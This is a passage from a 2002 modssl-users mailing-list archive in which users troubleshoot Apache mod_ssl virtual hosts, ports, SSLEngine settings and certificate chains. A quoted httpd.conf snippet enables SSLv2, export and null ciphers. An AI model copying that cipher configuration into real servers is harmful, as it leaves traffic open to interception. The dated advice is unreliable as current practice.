1.94.4] X-List-Name: modssl-users Matus \"fantomas\" Uhlar wrote: > > Hello, > > I'd like to know, how does modssl decide which port is ssl and which one is > non-ssl? if I bind apache to two ports, how to tell which one should be used > for ssl connects and which one for non-ssl connects? Apache is the process - mod_ssl is just a module. Only port 80 is listened to by default by apache so to get SSL to work you must explicitly say "Listen 443". > > Another question. if I run http on port 80 and httpd on port 443, and I > define only one virtualhost: > > > ServerName blablabla > > > will that virtualhost be available via both ports/protocols? I guess so... but this not a good idea since SSL requires lots of extra directives (like "SSLEngine on" - how they would interact with the HTTP host is not obvious... > Or, do I need to define two virtualhosts, one on port 80 without ssl and one > on 443 with ssl? This is a much better idea - keep the SSL and HTTP hosts completely separate, you will sleep better. > Warning: I don't wish to receive spam to this address. You'll be lucky! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 19:40:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA02942; Fri, 15 Feb 2002 19:39:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from work.fantomas.sk id TAA02880; Fri, 15 Feb 2002 19:38:45 +0100 (MET) Received: (from uhlar@localhost) by work.fantomas.sk (8.9.3/8.9.3/Debian 8.9.3-21) id TAA25669 for modssl-users@modssl.org; Fri, 15 Feb 2002 19:38:43 +0100 Date: Fri, 15 Feb 2002 19:38:43 +0100 From: "Matus \"fantomas\" Uhlar" To: modssl-users@modssl.org Subject: Re: the same virtualhost with http and https? Message-ID: <20020215193843.A25639@fantomas.sk> Mail-Followup-To: modssl-users@modssl.org References: <20020215175619.A25159@fantomas.sk> <3C6D49F8.BD0400ED@bourse.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3C6D49F8.BD0400ED@bourse.ch>; from obo@bourse.ch on Fri, Feb 15, 2002 at 06:48:40PM +0100 X-Echelon: nuclear bomb plane crash terrorist attack djihad spy echelon sucks Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Matus \"fantomas\" Uhlar" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -> > I'd like to know, how does modssl decide which port is ssl and which one is -> > non-ssl? if I bind apache to two ports, how to tell which one should be used -> > for ssl connects and which one for non-ssl connects? -> -> Apache is the process - mod_ssl is just a module. Only port 80 is -> listened to by default by apache so to get SSL to work you must -> explicitly say "Listen 443". Yes i know that :) The question is - how will mod_ssl know that it should process connections on port 443 and not on port 80. -> > Another question. if I run http on port 80 and httpd on port 443, and I -> > define only one virtualhost: -> > -> > -> > ServerName blablabla -> > -> > -> > will that virtualhost be available via both ports/protocols? -> -> I guess so... but this not a good idea since SSL requires lots of extra -> directives (like "SSLEngine on" - how they would interact with the HTTP -> host is not obvious... hmmm. I think I can put genric SSL directives into server's config and none special are _required_ for virtualhosts. I just have some virtualhosts and wish to give access to all of them without reconfiguring them. And that ebout sslengine was exactly hat i wanteddo know. couls i turnon SSLEngine on for all connections to one port and turn it off for all connections on other port? -> > Or, do I need to define two virtualhosts, one on port 80 without ssl and one -> > on 443 with ssl? -> -> This is a much better idea - keep the SSL and HTTP hosts completely -> separate, you will sleep better. -- Matus "fantomas" Uhlar, uhlar@fantomas.sk ; http://www.fantomas.sk/ Warning: I don't wish to receive spam to this address. Varovanie: Nezelam si na tuto adresu dostavat akukolvek reklamnu postu. Eagles may soar, but weasels don't get sucked into jet engines. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 19:51:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA03781; Fri, 15 Feb 2002 19:50:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id TAA03688; Fri, 15 Feb 2002 19:49:24 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA27894; Fri, 15 Feb 2002 13:55:49 -0500 Date: Fri, 15 Feb 2002 13:55:49 -0500 (EST) From: "R. DuFresne" To: "Matus \"fantomas\" Uhlar" cc: modssl-users@modssl.org Subject: Re: the same virtualhost with http and https? In-Reply-To: <20020215193843.A25639@fantomas.sk> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, 15 Feb 2002, Matus "fantomas" Uhlar wrote: > -> > I'd like to know, how does modssl decide which port is ssl and which one is > -> > non-ssl? if I bind apache to two ports, how to tell which one should be used > -> > for ssl connects and which one for non-ssl connects? > -> > -> Apache is the process - mod_ssl is just a module. Only port 80 is > -> listened to by default by apache so to get SSL to work you must > -> explicitly say "Listen 443". > > Yes i know that :) The question is - how will mod_ssl know that it should > process connections on port 443 and not on port 80. For one, it's a standard well known port: darkstar:~# grep 443 /etc/services https 443/tcp https # http protocol over TLS/SSL for two, it would most likely be part of your httpd.conf, with the listen directive. Get to know your /etc/services file and know it well, and if you have one not, or a sparse one, do a google search, the well know port/protocol combos are well documented on various url's out there... > > -> > Another question. if I run http on port 80 and httpd on port 443, and I > -> > define only one virtualhost: > -> > > -> > > -> > ServerName blablabla > -> > > -> > > -> > will that virtualhost be available via both ports/protocols? > -> > -> I guess so... but this not a good idea since SSL requires lots of extra > -> directives (like "SSLEngine on" - how they would interact with the HTTP > -> host is not obvious... > > hmmm. I think I can put genric SSL directives into server's config and none > special are _required_ for virtualhosts. I just have some virtualhosts and > wish to give access to all of them without reconfiguring them. > And that ebout sslengine was exactly hat i wanteddo know. couls i turnon > SSLEngine on for all connections to one port and turn it off for all > connections on other port? > Have you actually parsed through the defult httpd.conf file that is installed when you compile the openssl/mod-ssl/apache combo It's pretty well documented, and reading through it as one parses the FAQ and other documentation included is always a good starting point. > -> > Or, do I need to define two virtualhosts, one on port 80 without ssl and one > -> > on 443 with ssl? > -> > -> This is a much better idea - keep the SSL and HTTP hosts completely > -> separate, you will sleep better. > > Thanks, Ron DuFresne -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 15 21:53:46 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA13493; Fri, 15 Feb 2002 21:53:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.internet.gr id VAA13379; Fri, 15 Feb 2002 21:51:42 +0100 (MET) Received: from relay.internet.gr ([62.1.1.101]) by mail1.internet.gr (iPlanet Messaging Server 5.1 (built May 7 2001)) with SMTP id <0GRL00AX8DXZWD@mail1.internet.gr> for modssl-users@modssl.org; Fri, 15 Feb 2002 22:51:35 +0200 (EET) Received: (qmail 5903 invoked from network); Fri, 15 Feb 2002 20:51:05 +0000 Received: from gerfw.internet.gr (HELO null) (62.1.0.62) by relay.internet.gr with SMTP; Fri, 15 Feb 2002 20:51:05 +0000 Date: Fri, 15 Feb 2002 22:56:37 +0200 From: Pantelis Roditis Subject: a possible correction of the 'asn1 encoding routines:d2i_X509:expecting an asn1 sequence' To: Modssl-Users Message-id: MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-7 Content-transfer-encoding: 7BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Pantelis Roditis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I posted a question a couple days ago about the error mention in the subject. Thanks everyone for their help. I did a litle search on the web about it and i found out that many people had the same error. I manage to find a possible solution. I thought that its a good question about the FAQ. I found out that the key was with full chain cert and that was the proble. Here is the fix. openssl pkcs7 -in mycert.crt -print_certs -out certchain.crt Then a file certchain.crt has the certificates and your server's certificate also. Edit the file and in the bottom will find your certificate move it in the begining of the file and save it. Then point both your SSLCertificateFile and SSLCertificateChainFile in the certchain.crt. and start your server. Hope that helps Kind Regards Pantelis Roditis ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 17 14:51:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA01764; Sun, 17 Feb 2002 14:48:05 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from work.fantomas.sk id OAA01591; Sun, 17 Feb 2002 14:46:08 +0100 (MET) Received: (from uhlar@localhost) by work.fantomas.sk (8.9.3/8.9.3/Debian 8.9.3-21) id OAA02549 for modssl-users@modssl.org; Sun, 17 Feb 2002 14:46:06 +0100 Date: Sun, 17 Feb 2002 14:46:06 +0100 From: Matus fantomas Uhlar To: modssl-users@modssl.org Subject: Re: the same virtualhost with http and https? Message-ID: <20020217144605.B2258@fantomas.sk> Mail-Followup-To: modssl-users@modssl.org References: <20020215193843.A25639@fantomas.sk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from dufresne@sysinfo.com on Fri, Feb 15, 2002 at 01:55:49PM -0500 X-Echelon: nuclear bomb plane crash terrorist attack djihad spy echelon sucks Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Matus fantomas Uhlar X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -> > -> > I'd like to know, how does modssl decide which port is ssl and which one is -> > -> > non-ssl? if I bind apache to two ports, how to tell which one should be used -> > -> > for ssl connects and which one for non-ssl connects? -> > -> -> > -> Apache is the process - mod_ssl is just a module. Only port 80 is -> > -> listened to by default by apache so to get SSL to work you must -> > -> explicitly say "Listen 443". -> > -> > Yes i know that :) The question is - how will mod_ssl know that it -> > should process connections on port 443 and not on port 80. -> -> For one, it's a standard well known port: -> -> darkstar:~# grep 443 /etc/services -> https 443/tcp https # http protocol over -> TLS/SSL Does mod_ssl walk through /etc/services ? By compile time or by runtime? -> for two, it would most likely be part of your httpd.conf, with the listen -> directive. How do I define that apache should accept only non-encrypted connections on port 80 and only encrypted on 443? What if I would use other two ports? 81 and 444 for example. Would apache crash? or will it tell it doesn't know what kind of connections should wait on those ports? or will it expect http connections everywhere? -> > hmmm. I think I can put genric SSL directives into server's config and -> > none special are _required_ for virtualhosts. I just have some -> > virtualhosts and wish to give access to all of them without -> > reconfiguring them. And that ebout sslengine was exactly hat i -> > wanteddo know. couls i turnon SSLEngine on for all connections to one -> > port and turn it off for all connections on other port? -> -> Have you actually parsed through the defult httpd.conf file that is -> installed when you compile the openssl/mod-ssl/apache combo will ass in MM in that combo> It's pretty well documented, and reading -> through it as one parses the FAQ and other documentation included is -> always a good starting point. I didn't install anything yet. I am deciding between apache-ssl and mod-ssl; I did search the docs on the web. But i could not find answer to my questions. That's why I subscribed here. Maybe you could point me to exact answer of my question; ServerName blabla1 ServerName blabla2 will both servers, blabla1 and blabla2 be available on port 80 w/o SSL and on port 443 with SSL? should I use this to define behaviour of ports? SSLEngine Off SSLEngine On -- Matus "fantomas" Uhlar, uhlar@fantomas.sk ; http://www.fantomas.sk/ Warning: I don't wish to receive spam to this address. Varovanie: Nezelam si na tuto adresu dostavat akukolvek reklamnu postu. I drive way too fast to worry about cholesterol. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 17 19:06:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA29202; Sun, 17 Feb 2002 19:05:58 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id TAA29058; Sun, 17 Feb 2002 19:04:36 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16cUyi-0005iJ-00 for modssl-users@modssl.org; Sun, 17 Feb 2002 18:19:56 +0100 To: modssl-users@modssl.org Subject: Re: the same virtualhost with http and https? Message-ID: <1013966396.3c6fe63c8a3b4@webmail.regiocom.net> Date: Sun, 17 Feb 2002 18:19:56 +0100 (CET) From: NickM References: <20020215193843.A25639@fantomas.sk> <20020217144605.B2258@fantomas.sk> In-Reply-To: <20020217144605.B2258@fantomas.sk> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > How do I define that apache should accept only non-encrypted connections > on > port 80 and only encrypted on 443? This is only decided by the SSLEngine on statement, without that it doesnt matter what port number is what it will still be standard http. > What if I would use other two ports? 81 and 444 for example. Would > apache > crash? or will it tell it doesn't know what kind of connections should > wait > on those ports? or will it expect http connections everywhere? You can use any port you like pretty much, as long as its not already used. > I did search the docs on the web. But i could not find answer to my > questions. That's why I subscribed here. Maybe you could point me to > exact > answer of my question; > > > ServerName blabla1 > > > > ServerName blabla2 > > > will both servers, blabla1 and blabla2 be available on port 80 w/o SSL > and > on port 443 with SSL? should I use this to define behaviour of ports? As you have them there it is simply going to be two http servers. > > SSLEngine Off > > > > SSLEngine On > As you have it here, ONLY because of the sslengine directive will the second one be SSL enabled, otherwise it would be http on port 443 To recap: SSLEngine On Will be https://192.168.0.1/ Will be http://192.168.0.1:443/ SSLEngine On Will be https://192.168.0.1:80/ Nick ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 18 10:38:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA17309; Mon, 18 Feb 2002 10:31:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe090.worldonline.dk id KAA17152; Mon, 18 Feb 2002 10:29:52 +0100 (MET) Received: (qmail 24662 invoked by uid 0); 18 Feb 2002 09:29:45 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe090.worldonline.dk with SMTP; 18 Feb 2002 09:29:45 -0000 Date: Mon, 18 Feb 2002 10:28:49 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <1386107842.20020218102849@e-box.dk> To: modssl-users@modssl.org Subject: How do I check to see if it works? MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm having some problems with my router, so I'm not sure where my problem is, in the router or in my httpd.conf If I do a portscan of my machine, port 443 return stealth. But it should be open. Can port 443 return stealth because there is no server listening, or is it because it is closed? Anyway I have attached a snippet from my httpd.conf, where I have tried to adjust the example to my needs. Now I was hoping you guys could tell me if it look ok. It looks like this: DocumentRoot "/usr/local/www/data" ServerName ssl.duketech.net ServerAdmin you@your.address ErrorLog /var/log/httpd-error.log TransferLog /var/log/httpd-access.log SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLOptions +StdEnvVars SSLOptions +StdEnvVars SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 CustomLog /var/log/ssl_request_log \ "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" What is the , and SetEnvIf used for? How should I be able to request my page? Hope you can help me :) -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk -- "There are two ways to write error-free programs; only the third one works." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 18 13:11:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA28567; Mon, 18 Feb 2002 13:08:55 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id NAA28493; Mon, 18 Feb 2002 13:07:55 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 4A27DBD2A; Mon, 18 Feb 2002 12:04:31 +0100 (CET) Date: Mon, 18 Feb 2002 12:04:31 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: How do I check to see if it works? Message-ID: <20020218110431.GB6180@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <1386107842.20020218102849@e-box.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <1386107842.20020218102849@e-box.dk> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Feb 18, 2002 at 10:28:49AM +0100, Søren Neigaard wrote: > I'm having some problems with my router, so I'm not sure where my > problem is, in the router or in my httpd.conf > First look in your error_log from apache. > If I do a portscan of my machine, port 443 return stealth. But it > should be open. Can port 443 return stealth because there is no server > listening, or is it because it is closed? > netstat -an|grep 443 locally on the machine or openssl s_client -connect 192.168.1.4:443 > Anyway I have attached a snippet from my httpd.conf, where I have > tried to adjust the example to my needs. Now I was hoping you guys > could tell me if it look ok. It looks like this: > > > > DocumentRoot "/usr/local/www/data" > ServerName ssl.duketech.net > ServerAdmin you@your.address > ErrorLog /var/log/httpd-error.log > TransferLog /var/log/httpd-access.log > SSLEngine on > SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > > SSLOptions +StdEnvVars > > > SSLOptions +StdEnvVars > > SetEnvIf User-Agent ".*MSIE.*" \ > nokeepalive ssl-unclean-shutdown \ > downgrade-1.0 force-response-1.0 > CustomLog /var/log/ssl_request_log \ > "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" > > > You need the SSLCertificateFile and SSLCertificateKeyFile directives too - http://www.modssl.org/docs/2.8/ssl_reference.html#ToC10 http://www.modssl.org/docs/2.8/ssl_reference.html#ToC11 > What is the , and SetEnvIf used for? > See http://httpd.apache.org/docs/ vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 18 14:06:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA01854; Mon, 18 Feb 2002 13:57:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe030.worldonline.dk id NAA01752; Mon, 18 Feb 2002 13:55:52 +0100 (MET) Received: (qmail 13917 invoked by uid 0); 18 Feb 2002 12:55:43 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe030.worldonline.dk with SMTP; 18 Feb 2002 12:55:43 -0000 Date: Mon, 18 Feb 2002 13:54:36 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <17018454726.20020218135436@e-box.dk> To: Mads Toftum CC: modssl-users@modssl.org Subject: Re[2]: How do I check to see if it works? In-Reply-To: <20020218110431.GB6180@marvin-lnx.int.tele.dk> References: <1386107842.20020218102849@e-box.dk> <20020218110431.GB6180@marvin-lnx.int.tele.dk> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Monday, February 18, 2002, 12:04:31 PM, Mads wrote: MT> On Mon, Feb 18, 2002 at 10:28:49AM +0100, Søren Neigaard wrote: >> I'm having some problems with my router, so I'm not sure where my >> problem is, in the router or in my httpd.conf >> MT> First look in your error_log from apache. It doesn't get hit. Should I not be able to connect to my SSL site by trying ssl.duketech.net in my browser? >> If I do a portscan of my machine, port 443 return stealth. But it >> should be open. Can port 443 return stealth because there is no server >> listening, or is it because it is closed? >> MT> netstat -an|grep 443 locally on the machine or Returns nothing. MT> openssl s_client -connect 192.168.1.4:443 Gives: connect: Connection refused connect:errno=61 >> Anyway I have attached a snippet from my httpd.conf, where I have >> tried to adjust the example to my needs. Now I was hoping you guys >> could tell me if it look ok. It looks like this: >> >> >> >> DocumentRoot "/usr/local/www/data" >> ServerName ssl.duketech.net >> ServerAdmin you@your.address >> ErrorLog /var/log/httpd-error.log >> TransferLog /var/log/httpd-access.log >> SSLEngine on >> SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL >> >> SSLOptions +StdEnvVars >> >> >> SSLOptions +StdEnvVars >> >> SetEnvIf User-Agent ".*MSIE.*" \ >> nokeepalive ssl-unclean-shutdown \ >> downgrade-1.0 force-response-1.0 >> CustomLog /var/log/ssl_request_log \ >> "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" >> >> >> MT> You need the SSLCertificateFile and SSLCertificateKeyFile directives too - Ok I have those now. -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 19 05:43:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA09745; Tue, 19 Feb 2002 04:49:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail11.speakeasy.net id EAA09629; Tue, 19 Feb 2002 04:47:55 +0100 (MET) Received: (qmail 20285 invoked from network); 19 Feb 2002 03:21:12 -0000 Received: from unknown (HELO jftwinxp) ([64.81.201.187]) (envelope-sender ) by mail11.speakeasy.net (qmail-ldap-1.03) with SMTP for ; 19 Feb 2002 03:21:12 -0000 From: "Jose Torres" To: Subject: RE: Certificate Date: Mon, 18 Feb 2002 22:23:39 -0500 Message-ID: <000a01c1b8f4$d32d31d0$0300a8c0@jftwinxp> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jose Torres" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, all, I am looking for this response. If there was one, I also need to know if it is possible to run two vhosts with a single certificate? TIA -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Santosh Deshpande Sent: Monday, February 11, 2002 10:09 AM To: modssl-users@modssl.org Subject: Certificate hi all, I would like to know whether a SSL certificate is issued to a specific domain? Can I run have two vhosts configured with a single certificate e.g. www.mydomain.com ( 213.x.x.x:443) and sub.mydomain.com ( 213.x.x.y:443) regards, Santosh ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 19 21:09:36 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA05704; Tue, 19 Feb 2002 21:08:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id VAA05619; Tue, 19 Feb 2002 21:07:45 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16d56g-0006fL-00 for modssl-users@modssl.org; Tue, 19 Feb 2002 08:54:34 +0100 To: modssl-users@modssl.org Subject: RE: Certificate Message-ID: <1014105273.3c7204ba01aad@webmail.regiocom.net> Date: Tue, 19 Feb 2002 08:54:34 +0100 (CET) From: NickM References: <000a01c1b8f4$d32d31d0$0300a8c0@jftwinxp> In-Reply-To: <000a01c1b8f4$d32d31d0$0300a8c0@jftwinxp> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > hi all, > I would like to know whether a SSL certificate is issued to a > specific > domain? yes > Can I run have two vhosts configured with a single certificate > e.g. www.mydomain.com ( 213.x.x.x:443) > and sub.mydomain.com ( 213.x.x.y:443) only if it is a wild card certificate, i.e. *.mydomain.com anything else would bring up a message saying its not for that domain but would still work. Nick ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 19 21:23:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA07474; Tue, 19 Feb 2002 21:22:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe090.worldonline.dk id VAA07284; Tue, 19 Feb 2002 21:20:35 +0100 (MET) Received: (qmail 6277 invoked by uid 0); 19 Feb 2002 20:20:28 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe090.worldonline.dk with SMTP; 19 Feb 2002 20:20:28 -0000 Date: Tue, 19 Feb 2002 21:19:31 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <9510689250.20020219211931@e-box.dk> To: modssl-users@modssl.org Subject: Re[2]: How do I check to see if it works? In-Reply-To: <20020218110431.GB6180@marvin-lnx.int.tele.dk> References: <1386107842.20020218102849@e-box.dk> <20020218110431.GB6180@marvin-lnx.int.tele.dk> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Monday, February 18, 2002, 12:04:31 PM, Mads wrote: MT> On Mon, Feb 18, 2002 at 10:28:49AM +0100, Søren Neigaard wrote: >> I'm having some problems with my router, so I'm not sure where my >> problem is, in the router or in my httpd.conf >> MT> First look in your error_log from apache. It doesn't get hit. Should I not be able to connect to my SSL site by trying ssl.duketech.net in my browser? >> If I do a portscan of my machine, port 443 return stealth. But it >> should be open. Can port 443 return stealth because there is no server >> listening, or is it because it is closed? >> MT> netstat -an|grep 443 locally on the machine or Returns nothing. MT> openssl s_client -connect 192.168.1.4:443 Gives: connect: Connection refused connect:errno=61 >> Anyway I have attached a snippet from my httpd.conf, where I have >> tried to adjust the example to my needs. Now I was hoping you guys >> could tell me if it look ok. It looks like this: >> >> >> >> DocumentRoot "/usr/local/www/data" >> ServerName ssl.duketech.net >> ServerAdmin you@your.address >> ErrorLog /var/log/httpd-error.log >> TransferLog /var/log/httpd-access.log >> SSLEngine on >> SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL >> >> SSLOptions +StdEnvVars >> >> >> SSLOptions +StdEnvVars >> >> SetEnvIf User-Agent ".*MSIE.*" \ >> nokeepalive ssl-unclean-shutdown \ >> downgrade-1.0 force-response-1.0 >> CustomLog /var/log/ssl_request_log \ >> "%t %h %{SSL_PROTOCOL}x 